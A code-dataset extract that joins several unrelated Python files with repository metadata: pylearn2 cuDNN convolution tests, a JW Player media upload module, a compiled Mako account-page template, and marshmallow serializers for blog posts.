def test_get_params(self):
"""
Check whether the cudnn has stored the correct filters.
"""
self.assertEqual(self.cudnn2d.get_params(), [self.filters])
def test_get_weights_topo(self):
"""
Check whether the cudnn has stored the correct filters.
"""
self.assertTrue(np.all(
self.cudnn2d.get_weights_topo(borrow=True) ==
np.transpose(self.filters.get_value(borrow=True), (0, 2, 3, 1))))
def test_lmul(self):
"""
Use conv2D to check whether the convolution worked correctly.
"""
conv2d = Conv2D(self.filters, self.batch_size, self.input_space,
output_axes=('b', 'c', 0, 1),)
f_co = theano.function([self.image_tensor],
conv2d.lmul(self.image_tensor))
f_cu = theano.function([self.image_tensor],
self.cudnn2d.lmul(self.image_tensor))
self.assertTrue(np.allclose(f_co(self.image), f_cu(self.image)))
def test_set_batch_size(self):
"""
Make sure that setting the batch size actually changes the property.
"""
img_shape = self.cudnn2d._img_shape
self.cudnn2d.set_batch_size(self.batch_size + 10)
np.testing.assert_equal(self.cudnn2d._img_shape[0],
self.batch_size + 10)
np.testing.assert_equal(self.cudnn2d._img_shape[1:], img_shape[1:])
def test_axes(self):
"""
Test different output axes.
Use different output axes and see whether the output is what we
expect.
"""
default_axes = ('b', 'c', 0, 1)
axes = (0, 'b', 1, 'c')
another_axes = (0, 1, 'c', 'b')
# 1, 3, 0, 2
map_to_default = tuple(axes.index(axis) for axis in default_axes)
# 2, 0, 3, 1
map_to_another_axes = tuple(default_axes.index(axis) for
axis in another_axes)
input_space = Conv2DSpace((3, 3), num_channels=1, axes=another_axes)
# Apply cudnn2d with `axes` as output_axes
cudnn2d = Cudnn2D(self.filters, 1, input_space, output_axes=axes)
f = theano.function([self.image_tensor],
cudnn2d.lmul(self.image_tensor))
# Apply cudnn2d with default axes
f_def = theano.function([self.image_tensor],
self.cudnn2d.lmul(self.image_tensor))
# Apply f on the `another_axes`-shaped image
output = f(np.transpose(self.image, map_to_another_axes))
# Apply f_def on self.image (b,c,0,1)
output_def = np.array(f_def(self.image))
# transpose output to def
output = np.transpose(output, map_to_default)
np.testing.assert_allclose(output_def, output)
np.testing.assert_equal(output_def.shape, output.shape)
def test_channels(self):
"""
Go from 2 to 3 channels and see whether the shape is correct.
"""
input_space = Conv2DSpace((3, 3), num_channels=3)
filters_values = np.ones(
(2, 3, 2, 2), dtype=theano.config.floatX
)
filters = sharedX(filters_values)
image = np.random.rand(1, 3, 3, 3).astype(theano.config.floatX)
cudnn2d = Cudnn2D(filters, 1, input_space)
f = theano.function([self.image_tensor],
cudnn2d.lmul(self.image_tensor))
assert f(image).shape == (1, 2, 2, 2)
def test_make_random_conv2D(self):
"""
Test a random convolution.
Create a random convolution and check whether the shape, axes and
input space are all what we expect.
"""
output_space = Conv2DSpace((2, 2), 1)
cudnn2d = make_random_conv2D(1, self.input_space, output_space,
(2, 2), 1)
f = theano.function([self.image_tensor],
cudnn2d.lmul(self.image_tensor))
assert f(self.image).shape == (1, 2, 2, 1)
assert cudnn2d._input_space == self.input_space
assert cudnn2d._output_axes == output_space.axes
| 35.769231 | 79 | 0.603309 | """
Tests for the Cudnn code.
"""
__author__ = "Francesco Visin"
__license__ = "3-clause BSD"
__credits__ = "Francesco Visin"
__maintainer__ = "Lisa Lab"
import theano
from theano import tensor
from theano.sandbox.cuda.dnn import dnn_available
from pylearn2.linear.conv2d import Conv2D
from pylearn2.linear.cudnn2d import Cudnn2D, make_random_conv2D
from pylearn2.space import Conv2DSpace
from pylearn2.utils import sharedX
from pylearn2.testing.skip import skip_if_no_gpu
import unittest
from nose.plugins.skip import SkipTest
import numpy as np
class TestCudnn(unittest.TestCase):
"""
Tests for the Cudnn code.
Parameters
----------
Refer to unittest.TestCase.
"""
def setUp(self):
"""
Set up a test image and filter to re-use.
"""
skip_if_no_gpu()
if not dnn_available():
raise SkipTest('Skipping tests cause cudnn is not available')
self.orig_floatX = theano.config.floatX
theano.config.floatX = 'float32'
self.image = np.random.rand(1, 1, 3, 3).astype(theano.config.floatX)
self.image_tensor = tensor.tensor4()
self.input_space = Conv2DSpace((3, 3), 1, axes=('b', 'c', 0, 1))
self.filters_values = np.ones(
(1, 1, 2, 2), dtype=theano.config.floatX
)
self.filters = sharedX(self.filters_values, name='filters')
self.batch_size = 1
self.cudnn2d = Cudnn2D(self.filters, self.batch_size, self.input_space)
def tearDown(self):
"""
After test clean up.
"""
theano.config.floatX = self.orig_floatX
def test_value_errors(self):
"""
Check correct errors are raised when bad input is given.
"""
with self.assertRaises(AssertionError):
Cudnn2D(filters=self.filters, batch_size=-1,
input_space=self.input_space)
def test_get_params(self):
"""
Check whether the cudnn has stored the correct filters.
"""
self.assertEqual(self.cudnn2d.get_params(), [self.filters])
def test_get_weights_topo(self):
"""
Check whether the cudnn has stored the correct filters.
"""
self.assertTrue(np.all(
self.cudnn2d.get_weights_topo(borrow=True) ==
np.transpose(self.filters.get_value(borrow=True), (0, 2, 3, 1))))
def test_lmul(self):
"""
Use conv2D to check whether the convolution worked correctly.
"""
conv2d = Conv2D(self.filters, self.batch_size, self.input_space,
output_axes=('b', 'c', 0, 1),)
f_co = theano.function([self.image_tensor],
conv2d.lmul(self.image_tensor))
f_cu = theano.function([self.image_tensor],
self.cudnn2d.lmul(self.image_tensor))
self.assertTrue(np.allclose(f_co(self.image), f_cu(self.image)))
def test_set_batch_size(self):
"""
Make sure that setting the batch size actually changes the property.
"""
img_shape = self.cudnn2d._img_shape
self.cudnn2d.set_batch_size(self.batch_size + 10)
np.testing.assert_equal(self.cudnn2d._img_shape[0],
self.batch_size + 10)
np.testing.assert_equal(self.cudnn2d._img_shape[1:], img_shape[1:])
def test_axes(self):
"""
Test different output axes.
Use different output axes and see whether the output is what we
expect.
"""
default_axes = ('b', 'c', 0, 1)
axes = (0, 'b', 1, 'c')
another_axes = (0, 1, 'c', 'b')
# 1, 3, 0, 2
map_to_default = tuple(axes.index(axis) for axis in default_axes)
# 2, 0, 3, 1
map_to_another_axes = tuple(default_axes.index(axis) for
axis in another_axes)
input_space = Conv2DSpace((3, 3), num_channels=1, axes=another_axes)
# Apply cudnn2d with `axes` as output_axes
cudnn2d = Cudnn2D(self.filters, 1, input_space, output_axes=axes)
f = theano.function([self.image_tensor],
cudnn2d.lmul(self.image_tensor))
# Apply cudnn2d with default axes
f_def = theano.function([self.image_tensor],
self.cudnn2d.lmul(self.image_tensor))
# Apply f on the `another_axes`-shaped image
output = f(np.transpose(self.image, map_to_another_axes))
# Apply f_def on self.image (b,c,0,1)
output_def = np.array(f_def(self.image))
# transpose output to def
output = np.transpose(output, map_to_default)
np.testing.assert_allclose(output_def, output)
np.testing.assert_equal(output_def.shape, output.shape)
def test_channels(self):
"""
Go from 2 to 3 channels and see whether the shape is correct.
"""
input_space = Conv2DSpace((3, 3), num_channels=3)
filters_values = np.ones(
(2, 3, 2, 2), dtype=theano.config.floatX
)
filters = sharedX(filters_values)
image = np.random.rand(1, 3, 3, 3).astype(theano.config.floatX)
cudnn2d = Cudnn2D(filters, 1, input_space)
f = theano.function([self.image_tensor],
cudnn2d.lmul(self.image_tensor))
assert f(image).shape == (1, 2, 2, 2)
def test_make_random_conv2D(self):
"""
Test a random convolution.
Create a random convolution and check whether the shape, axes and
input space are all what we expect.
"""
output_space = Conv2DSpace((2, 2), 1)
cudnn2d = make_random_conv2D(1, self.input_space, output_space,
(2, 2), 1)
f = theano.function([self.image_tensor],
cudnn2d.lmul(self.image_tensor))
assert f(self.image).shape == (1, 2, 2, 1)
assert cudnn2d._input_space == self.input_space
assert cudnn2d._output_axes == output_space.axes
| 0 | 0 | 0 |
1c3b62adbe33c307499ef5ecfd5530a3a22e0a35 | 10,715 | py | Python | jwplatform/upload.py | jwplayer/jwplayer-py | 2f478550414145e9d36b1cdf901dcf5360f8fe2b | [
"MIT"
] | 37 | 2016-09-14T20:34:42.000Z | 2022-02-15T06:47:21.000Z | jwplatform/upload.py | jwplayer/jwplayer-py | 2f478550414145e9d36b1cdf901dcf5360f8fe2b | [
"MIT"
] | 24 | 2016-11-16T21:36:13.000Z | 2022-02-18T14:37:35.000Z | jwplatform/upload.py | jwplayer/jwplayer-py | 2f478550414145e9d36b1cdf901dcf5360f8fe2b | [
"MIT"
] | 45 | 2016-10-13T08:41:35.000Z | 2022-03-06T02:31:23.000Z | import http.client
import logging
import math
import os
from dataclasses import dataclass
from enum import Enum
from hashlib import md5
from urllib.parse import urlparse
MAX_PAGE_SIZE = 1000
MIN_PART_SIZE = 5 * 1024 * 1024
UPLOAD_BASE_URL = 'upload.jwplayer.com'
MAX_FILE_SIZE = 25 * 1000 * 1024 * 1024
class UploadType(Enum):
"""
This class stores the enum values for the different type of uploads.
"""
direct = "direct"
multipart = "multipart"
@dataclass
class UploadContext:
"""
This class stores the structure for an upload context so that it can be resumed later.
"""
"""
This method evaluates whether an upload can be resumed based on the upload context state
"""
class MultipartUpload:
"""
This class manages the multi-part upload.
"""
@property
@upload_context.setter
def upload(self):
"""
This methods uploads the parts for the multi-part upload.
Returns:
"""
if self._target_part_size < MIN_PART_SIZE:
raise ValueError(f"The part size has to be at least greater than {MIN_PART_SIZE} bytes.")
filename = self._file.name
file_size = os.stat(filename).st_size
part_count = math.ceil(file_size / self._target_part_size)
if part_count > 10000:
raise ValueError("The given file cannot be divided into more than 10000 parts. Please try increasing the "
"target part size.")
# Upload the parts
self._upload_parts(part_count)
# Mark upload as complete
self._mark_upload_completion()
class SingleUpload:
"""
This class manages the operations related to the upload of a media file via a direct link.
"""
@property
@upload_context.setter
def upload(self):
"""
Uploads the media file to the actual location as specified in the direct link.
Returns:
"""
self._logger.debug(f"Starting to upload file:{self._file.name}")
bytes_chunk = self._file.read()
computed_hash = _get_bytes_hash(bytes_chunk)
retry_count = 0
for _ in range(self._upload_retry_count):
try:
response = _upload_to_s3(bytes_chunk, self._upload_link)
returned_hash = _get_returned_hash(response)
# The returned hash is surrounded by '"' character
if repr(returned_hash) != repr(f"\"{computed_hash}\""):
raise DataIntegrityError(
"The hash of the uploaded file does not match with the hash on the server.")
self._logger.debug(f"Successfully uploaded file {self._file.name}.")
return
except (IOError, PartUploadError, DataIntegrityError, OSError) as err:
self._logger.warning(err)
self._logger.exception(err, stack_info=True)
self._logger.warning(f"Encountered error uploading file {self._file.name}.")
retry_count = retry_count + 1
if retry_count >= self._upload_retry_count:
self._file.seek(0, 0)
raise MaxRetriesExceededError(f"Max retries exceeded while uploading file {self._file.name}") \
from err
except Exception as ex:
self._file.seek(0, 0)
self._logger.exception(ex)
raise
class DataIntegrityError(Exception):
"""
This class is used to wrap exceptions when the uploaded data failed a data integrity check with the current file
part hash.
"""
pass
class MaxRetriesExceededError(Exception):
"""
This class is used to wrap exceptions when the number of retries are exceeded while uploading a part.
"""
pass
class PartUploadError(Exception):
"""
This class is used to wrap exceptions that occur because of part upload errors.
"""
pass
class S3UploadError(PartUploadError):
"""
This class extends the PartUploadError exception class when the upload is done via S3.
"""
pass
class UnrecoverableError(Exception):
"""
This class wraps exceptions that should not be recoverable or resumed from.
"""
pass
| 37.996454 | 120 | 0.629585 | import http.client
import logging
import math
import os
from dataclasses import dataclass
from enum import Enum
from hashlib import md5
from urllib.parse import urlparse
MAX_PAGE_SIZE = 1000
MIN_PART_SIZE = 5 * 1024 * 1024
UPLOAD_BASE_URL = 'upload.jwplayer.com'
MAX_FILE_SIZE = 25 * 1000 * 1024 * 1024
class UploadType(Enum):
"""
This class stores the enum values for the different type of uploads.
"""
direct = "direct"
multipart = "multipart"
@dataclass
class UploadContext:
"""
This class stores the structure for an upload context so that it can be resumed later.
"""
def __init__(self, upload_method, upload_id, upload_token, direct_link):
self.upload_method = upload_method
self.upload_id = upload_id
self.upload_token = upload_token
self.direct_link = direct_link
"""
This method evaluates whether an upload can be resumed based on the upload context state
"""
def can_resume(self) -> bool:
return self.upload_token is not None \
and self.upload_method == UploadType.multipart.value \
and self.upload_id is not None
def _upload_to_s3(bytes_chunk, upload_link):
url_metadata = urlparse(upload_link)
if url_metadata.scheme in 'https':
connection = http.client.HTTPSConnection(host=url_metadata.hostname)
else:
connection = http.client.HTTPConnection(host=url_metadata.hostname)
connection.request('PUT', upload_link, body=bytes_chunk)
response = connection.getresponse()
if 200 <= response.status <= 299:
return response
raise S3UploadError(response)
def _get_bytes_hash(bytes_chunk):
return md5(bytes_chunk).hexdigest()
def _get_returned_hash(response):
return response.headers['ETag']
class MultipartUpload:
"""
This class manages the multi-part upload.
"""
def __init__(self, client, file, target_part_size, retry_count, upload_context: UploadContext):
self._upload_id = upload_context.upload_id
self._target_part_size = target_part_size
self._upload_retry_count = retry_count
self._file = file
self._client = client
self._logger = logging.getLogger(self.__class__.__name__)
self._upload_context = upload_context
@property
def upload_context(self):
return self._upload_context
@upload_context.setter
def upload_context(self, value):
self._upload_context = value
def upload(self):
"""
This methods uploads the parts for the multi-part upload.
Returns:
"""
if self._target_part_size < MIN_PART_SIZE:
raise ValueError(f"The part size has to be at least greater than {MIN_PART_SIZE} bytes.")
filename = self._file.name
file_size = os.stat(filename).st_size
part_count = math.ceil(file_size / self._target_part_size)
if part_count > 10000:
raise ValueError("The given file cannot be divided into more than 10000 parts. Please try increasing the "
"target part size.")
# Upload the parts
self._upload_parts(part_count)
# Mark upload as complete
self._mark_upload_completion()
def _upload_parts(self, part_count):
try:
filename = self._file.name
remaining_parts_count = part_count
total_page_count = math.ceil(part_count / MAX_PAGE_SIZE)
for page_number in range(1, total_page_count + 1):
batch_size = min(remaining_parts_count, MAX_PAGE_SIZE)
page_length = MAX_PAGE_SIZE
remaining_parts_count = remaining_parts_count - batch_size
query_params = {'page_length': page_length, 'page': page_number}
self._logger.debug(
f'calling list method with page_number:{page_number} and page_length:{page_length}.')
body = self._retrieve_part_links(query_params)
upload_links = body['parts']
for returned_part in upload_links[:batch_size]:
part_number = returned_part['id']
bytes_chunk = self._file.read(self._target_part_size)
if part_number < batch_size and len(bytes_chunk) != self._target_part_size:
raise IOError("Failed to read enough bytes")
retry_count = 0
for _ in range(self._upload_retry_count):
try:
self._upload_part(bytes_chunk, part_number, returned_part)
self._logger.debug(
f"Successfully uploaded part {(page_number - 1) * MAX_PAGE_SIZE + part_number} "
f"of {part_count} for upload id {self._upload_id}")
break
except (DataIntegrityError, PartUploadError, OSError) as err:
self._logger.warning(err)
retry_count = retry_count + 1
self._logger.warning(
f"Encountered error upload part {(page_number - 1) * MAX_PAGE_SIZE + part_number} "
f"of {part_count} for file {filename}.")
if retry_count >= self._upload_retry_count:
self._file.seek(0, 0)
raise MaxRetriesExceededError(
f"Max retries ({self._upload_retry_count}) exceeded while uploading part"
f" {part_number} of {part_count} for file {filename}.") from err
except Exception as ex:
self._file.seek(0, 0)
self._logger.exception(ex)
raise
def _retrieve_part_links(self, query_params):
resp = self._client.list(upload_id=self._upload_id, query_params=query_params)
return resp.json_body
def _upload_part(self, bytes_chunk, part_number, returned_part):
computed_hash = _get_bytes_hash(bytes_chunk)
# Check if the file has already been uploaded and the hash matches. Return immediately without doing anything
# if the hash matches.
upload_hash = self._get_uploaded_part_hash(returned_part)
if upload_hash and (repr(upload_hash) == repr(f"{computed_hash}")): # returned hash is not surrounded by '"'
self._logger.debug(f"Part number {part_number} already uploaded. Skipping")
return
if upload_hash:
raise UnrecoverableError(f'The file part {part_number} has been uploaded but the hash of the uploaded part '
f'does not match the hash of the current part read. Aborting.')
if "upload_link" not in returned_part:
raise KeyError(f"Invalid upload link for part {part_number}.")
returned_part = returned_part["upload_link"]
response = _upload_to_s3(bytes_chunk, returned_part)
returned_hash = _get_returned_hash(response)
if repr(returned_hash) != repr(f"\"{computed_hash}\""): # The returned hash is surrounded by '"' character
raise DataIntegrityError("The hash of the uploaded file does not match with the hash on the server.")
def _get_uploaded_part_hash(self, upload_link):
upload_hash = upload_link.get("etag")
return upload_hash
def _mark_upload_completion(self):
self._client.complete(self._upload_id)
self._logger.info("Upload successful!")
class SingleUpload:
"""
This class manages the operations related to the upload of a media file via a direct link.
"""
def __init__(self, upload_link, file, retry_count, upload_context: UploadContext):
self._upload_link = upload_link
self._upload_retry_count = retry_count
self._file = file
self._logger = logging.getLogger(self.__class__.__name__)
self._upload_context = upload_context
@property
def upload_context(self):
return self._upload_context
@upload_context.setter
def upload_context(self, value):
self._upload_context = value
def upload(self):
"""
Uploads the media file to the actual location as specified in the direct link.
Returns:
"""
self._logger.debug(f"Starting to upload file:{self._file.name}")
bytes_chunk = self._file.read()
computed_hash = _get_bytes_hash(bytes_chunk)
retry_count = 0
for _ in range(self._upload_retry_count):
try:
response = _upload_to_s3(bytes_chunk, self._upload_link)
returned_hash = _get_returned_hash(response)
# The returned hash is surrounded by '"' character
if repr(returned_hash) != repr(f"\"{computed_hash}\""):
raise DataIntegrityError(
"The hash of the uploaded file does not match with the hash on the server.")
self._logger.debug(f"Successfully uploaded file {self._file.name}.")
return
except (IOError, PartUploadError, DataIntegrityError, OSError) as err:
self._logger.warning(err)
self._logger.exception(err, stack_info=True)
self._logger.warning(f"Encountered error uploading file {self._file.name}.")
retry_count = retry_count + 1
if retry_count >= self._upload_retry_count:
self._file.seek(0, 0)
raise MaxRetriesExceededError(f"Max retries exceeded while uploading file {self._file.name}") \
from err
except Exception as ex:
self._file.seek(0, 0)
self._logger.exception(ex)
raise
class DataIntegrityError(Exception):
"""
This class is used to wrap exceptions when the uploaded data failed a data integrity check with the current file
part hash.
"""
pass
class MaxRetriesExceededError(Exception):
"""
This class is used to wrap exceptions when the number of retries are exceeded while uploading a part.
"""
pass
class PartUploadError(Exception):
"""
This class is used to wrap exceptions that occur because of part upload errors.
"""
pass
class S3UploadError(PartUploadError):
"""
This class extends the PartUploadError exception class when the upload is done via S3.
"""
pass
class UnrecoverableError(Exception):
"""
This class wraps exceptions that should not be recoverable or resumed from.
"""
pass
| 6,027 | 0 | 415 |
5449d8703937beaae96be29dfe6aa5cc9777ee9b | 3,352 | py | Python | catalog/cached_templates/templates/users.html.py | nateyj/colonial-heritage | 1c7a4115b7bffed9b00c3375ece1641d308addf2 | [
"Apache-2.0"
] | null | null | null | catalog/cached_templates/templates/users.html.py | nateyj/colonial-heritage | 1c7a4115b7bffed9b00c3375ece1641d308addf2 | [
"Apache-2.0"
] | null | null | null | catalog/cached_templates/templates/users.html.py | nateyj/colonial-heritage | 1c7a4115b7bffed9b00c3375ece1641d308addf2 | [
"Apache-2.0"
] | null | null | null | # -*- coding:ascii -*-
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1425177385.390867
_enable_loop = True
_template_filename = '/Users/Nate/chf_dmp/account/templates/users.html'
_template_uri = 'users.html'
_source_encoding = 'ascii'
import os, os.path, re
_exports = ['content']
"""
__M_BEGIN_METADATA
{"source_encoding": "ascii", "uri": "users.html", "filename": "/Users/Nate/chf_dmp/account/templates/users.html", "line_map": {"64": 32, "65": 37, "66": 37, "35": 1, "68": 38, "74": 68, "45": 3, "27": 0, "67": 38, "52": 3, "53": 12, "54": 12, "55": 16, "56": 16, "57": 20, "58": 20, "59": 24, "60": 24, "61": 28, "62": 28, "63": 32}}
__M_END_METADATA
"""
| 36.835165 | 333 | 0.605609 | # -*- coding:ascii -*-
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1425177385.390867
_enable_loop = True
_template_filename = '/Users/Nate/chf_dmp/account/templates/users.html'
_template_uri = 'users.html'
_source_encoding = 'ascii'
import os, os.path, re
_exports = ['content']
def _mako_get_namespace(context, name):
try:
return context.namespaces[(__name__, name)]
except KeyError:
_mako_generate_namespaces(context)
return context.namespaces[(__name__, name)]
def _mako_generate_namespaces(context):
pass
def _mako_inherit(template, context):
_mako_generate_namespaces(context)
return runtime._inherit_from(context, 'base.htm', _template_uri)
def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
user = context.get('user', UNDEFINED)
def content():
return render_content(context._locals(__M_locals))
__M_writer = context.writer()
__M_writer('\n\n')
if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):
context['self'].content(**pageargs)
return ''
finally:
context.caller_stack._pop_frame()
def render_content(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
user = context.get('user', UNDEFINED)
def content():
return render_content(context)
__M_writer = context.writer()
__M_writer(
'\n\n<div>\n <h1 class="page-header text-left">My Account</h1>\n</div>\n\n<table id="users_table" class="table table-striped">\n <tr>\n <td>First Name</td>\n <td>')
__M_writer(str(user.first_name))
__M_writer('</td>\n </tr>\n <tr>\n <td>Last Name</td>\n <td>')
__M_writer(str(user.last_name))
__M_writer('</td>\n </tr>\n <tr>\n <td>Username</td>\n <td>')
__M_writer(str(user.username))
__M_writer('</td>\n </tr>\n <tr>\n <td>Security Question</td>\n <td>')
__M_writer(str(user.security_question))
__M_writer('</td>\n </tr>\n <tr>\n <td>Security Answer</td>\n <td>')
__M_writer(str(user.security_answer))
__M_writer('</td>\n </tr>\n <tr>\n <td>Email</td>\n <td>')
__M_writer(str(user.email))
__M_writer('</td>\n </tr>\n</table>\n\n<div>\n <a class="btn btn-primary" href="/account/users.edit/')
__M_writer(str(user.id))
__M_writer('/">Edit</a>\n <a class="btn btn-primary" href="/account/users.delete/')
__M_writer(str(user.id))
__M_writer('/">Delete</a>\n</div>\n\n')
return ''
finally:
context.caller_stack._pop_frame()
"""
__M_BEGIN_METADATA
{"source_encoding": "ascii", "uri": "users.html", "filename": "/Users/Nate/chf_dmp/account/templates/users.html", "line_map": {"64": 32, "65": 37, "66": 37, "35": 1, "68": 38, "74": 68, "45": 3, "27": 0, "67": 38, "52": 3, "53": 12, "54": 12, "55": 16, "56": 16, "57": 20, "58": 20, "59": 24, "60": 24, "61": 28, "62": 28, "63": 32}}
__M_END_METADATA
"""
| 2,456 | 0 | 115 |
11d8435c09250104be6bc54f46e1e26899f5e541 | 9,456 | py | Python | server/pages/post/modules/serializer.py | Danutu89/NewApp-V2 | ffec4afc1bd0bb8663584b7baf6c7941b2c3f781 | [
"MIT"
] | 1 | 2020-05-26T20:36:39.000Z | 2020-05-26T20:36:39.000Z | server/pages/post/modules/serializer.py | Danutu89/NewApp-V2 | ffec4afc1bd0bb8663584b7baf6c7941b2c3f781 | [
"MIT"
] | 4 | 2021-03-31T19:47:15.000Z | 2022-03-12T00:31:17.000Z | server/pages/post/modules/serializer.py | Danutu89/NewApp-V2 | ffec4afc1bd0bb8663584b7baf6c7941b2c3f781 | [
"MIT"
] | null | null | null | from marshmallow import fields, Schema
from marshmallow_sqlalchemy import SQLAlchemyAutoSchema, ModelSchema
from models import Saved_Posts, Post_Likes, User_Following, User, Post_Info, Post, Post_Tags, Comment_Likes, Reply_Likes
from sqlalchemy import and_
from .utilities import cleanhtml
import re
from app import db
PostSchemaOnly = PostSchema(many=False)
| 25.626016 | 179 | 0.552453 | from marshmallow import fields, Schema
from marshmallow_sqlalchemy import SQLAlchemyAutoSchema, ModelSchema
from models import Saved_Posts, Post_Likes, User_Following, User, Post_Info, Post, Post_Tags, Comment_Likes, Reply_Likes
from sqlalchemy import and_
from .utilities import cleanhtml
import re
from app import db
class AuthorLocation(Schema):
country = fields.Method('getCountry')
flag = fields.Method('getFlag')
class Meta:
fields = (
'country',
'flag'
)
def getCountry(self, obj):
return obj.location.country
def getFlag(self, obj):
return obj.location.flag
class PostTagSchema(Schema):
class Meta:
fields = (
'name',
'color',
'icon'
)
class PostTagsSchema(Schema):
name = fields.Method('getName')
color = fields.Method('getColor')
icon = fields.Method('getIcon')
class Meta:
fields = (
'name',
'color',
'icon'
)
def getName(self, obj):
return obj.tag.name
def getColor(self, obj):
return obj.tag.color
def getIcon(self, obj):
return obj.tag.icon
class PostInfoMinSchema(Schema):
posted_on = fields.Method('getTimeAgo')
likes_count = fields.Method('getLikesCount')
tags = fields.Nested(PostTagsSchema, many=True)
class Meta:
fields = (
'thumbnail',
'posted_on',
'likes_count',
'tags',
)
def getTimeAgo(self, obj):
return obj.time_ago()
def getLikesCount(self, obj):
return len(obj.likes)
class AuthorInfoMinSchema(Schema):
full_name = fields.Method('getFullName')
def getFullName(self, obj):
return obj.first_name + ' ' + obj.last_name
class Meta:
fields = (
'avatar_img',
'full_name'
)
class AuthorMinSchema(Schema):
info = fields.Nested(AuthorInfoMinSchema)
class Meta:
fields = (
'name',
'info'
)
class PostMinSchema(Schema):
author = fields.Nested(AuthorMinSchema)
info = fields.Nested(PostInfoMinSchema)
saved = fields.Method('ifSaved')
tags = fields.Nested(PostTagsSchema, many=True)
class Meta:
fields = (
'title',
'read_time',
'author',
'info',
'link',
'saved',
'tags'
)
def ifSaved(self, obj):
currentUser = self.context.get('currentUser')
if currentUser:
if Saved_Posts.get().filter(and_(Saved_Posts.user==currentUser.id, Saved_Posts.post==obj.id)).first():
return True
else:
return False
else:
return False
class RepliesSchema(Schema):
author = fields.Nested(AuthorMinSchema)
mentions = fields.Method('getMentions')
userInfo = fields.Method('getUserInfo')
class Meta:
fields = (
'author',
'text',
'mentions',
'id',
'userInfo'
)
def getMentions(self, obj):
m = []
mentions = re.findall("@([a-zA-Z0-9]{1,15})", cleanhtml(obj.text))
for mention in mentions:
check = User.get().filter_by(name=mention).first()
if check is not None:
m.append(mention)
return m
def getUserInfo(self, obj):
currentUser = self.context.get('currentUser')
if currentUser:
return {
'liked': True if Reply_Likes.get().filter(and_(Reply_Likes.author==currentUser.id, Post_Likes.post==obj.id)).first() is not None else False,
'mine': True if obj.author.id == currentUser.id else False,
}
else:
return {
'liked': False,
'mine': False,
}
class CommentsSchema(Schema):
author = fields.Nested(AuthorMinSchema)
replies = fields.Nested(RepliesSchema, many=True)
mentions = fields.Method('getMentions')
userInfo = fields.Method('getUserInfo')
class Meta:
fields = (
'author',
'text',
'replies',
'mentions',
'id',
'userInfo'
)
def getMentions(self, obj):
m = []
mentions = re.findall("@([a-zA-Z0-9]{1,15})", cleanhtml(obj.text))
for mention in mentions:
check = User.get().filter_by(name=mention).first()
if check is not None:
m.append(mention)
return m
def getUserInfo(self, obj):
currentUser = self.context.get('currentUser')
if currentUser:
return {
'liked': True if Comment_Likes.get().filter(and_(Comment_Likes.author==currentUser.id, Comment_Likes.comment==obj.id)).first() is not None else False,
'mine': True if obj.author.id == currentUser.id else False,
}
else:
return {
'liked': False,
'mine': False,
}
class PostLikesSchema(Schema):
name = fields.Method('getName')
color = fields.Method('getColor')
icon = fields.Method('getIcon')
class Meta:
fields = (
'name',
'color',
'icon',
)
def getName(self, obj):
return obj.like.name
def getColor(self, obj):
return obj.like.color
def getIcon(self, obj):
return obj.like.icon
class PostInfoSchema(Schema):
posted_on = fields.Method('getTimeAgo')
likes_count = fields.Method('getLikesCount')
tags = fields.Nested(PostTagsSchema, many=True)
description = fields.Method('getDesc')
keywords = fields.Method('getKeywords')
comments = fields.Nested(CommentsSchema, many=True)
class Meta:
fields = (
'thumbnail',
'posted_on',
'likes_count',
'tags',
'text',
'description',
'keywords',
'closed',
'closed_on',
'closed_by',
'comments'
)
def getTimeAgo(self, obj):
return obj.time_ago()
def getLikesCount(self, obj):
return len(obj.likes)
def getDesc(self, obj):
return cleanhtml(obj.text)[:97]
def getKeywords(self, obj):
return ', '.join([key.tag.name for key in obj.tags])
class AuthorPersSchema(Schema):
class Meta:
fields = (
'profession',
)
class AuthorInfoSchema(Schema):
full_name = fields.Method('getFullName')
joined_on = fields.Method('getJoinedOn')
class Meta:
fields = (
'avatar_img',
'full_name',
'joined_on'
)
def getFullName(self, obj):
return obj.first_name + ' ' + obj.last_name
def getJoinedOn(self, obj):
return str(obj.created_on.ctime())[:-14] + ' ' + str(obj.created_on.ctime())[20:]
class LanguageSchema(Schema):
class Meta:
fields = (
'code',
'name'
)
class AuthorSchema(Schema):
info = fields.Nested(AuthorInfoSchema)
posts = fields.Nested(PostMinSchema, many=True)
location = fields.Nested(AuthorLocation)
language = fields.Nested(LanguageSchema)
pers = fields.Nested(AuthorPersSchema)
class Meta:
fields = (
'name',
'info',
'posts',
'location',
'pers',
'language'
)
class PostLikes(Schema):
class Meta:
fields = (
'author',
'info'
)
class PostSchema(Schema):
author = fields.Nested(AuthorSchema)
info = fields.Nested(PostInfoSchema)
userInfo = fields.Method('getUserInfo')
class Meta:
fields = (
'title',
'read_time',
'author',
'info',
'link',
'userInfo',
'id'
)
def getUserInfo(self, obj):
currentUser = self.context.get('currentUser')
if currentUser:
return {
'liked': True if Post_Likes.get().filter(and_(Post_Likes.author==currentUser.id, Post_Likes.post==obj.id)).first() is not None else False,
'following': True if User_Following.get().filter(and_(User_Following.user==currentUser.id, User_Following.followed==obj.author.id)).first() is not None else False,
'mine': True if obj.author.id == currentUser.id else False,
'saved': True if Saved_Posts.get().filter(and_(Saved_Posts.user==currentUser.id, Saved_Posts.post==obj.id)).first() is not None else False
}
else:
return {
'liked': False,
'mine': False,
}
PostSchemaOnly = PostSchema(many=False)
class NewPostTagsSchema(ModelSchema):
class Meta:
model = Post_Tags
include_fk = True
sqla_session = db.session
class NewPostInfoSchema(ModelSchema):
tags = fields.Nested(NewPostTagsSchema, many=True)
class Meta:
model = Post_Info
sqla_session = db.session
class NewPostSchema(ModelSchema):
info = fields.Nested(NewPostInfoSchema, many=False)
class Meta:
model = Post
include_fk = True
sqla_session = db.session
| 3,354 | 5,279 | 460 |
9738f0d9c5f112205aaf26af33856c4224875478 | 1,552 | py | Python | ops_challenge/ops-challenge17/classes/ssh.py | jinwoov/Ops401 | 28db339e1edac31fb82640a76ebb01c4218984a0 | [
"MIT"
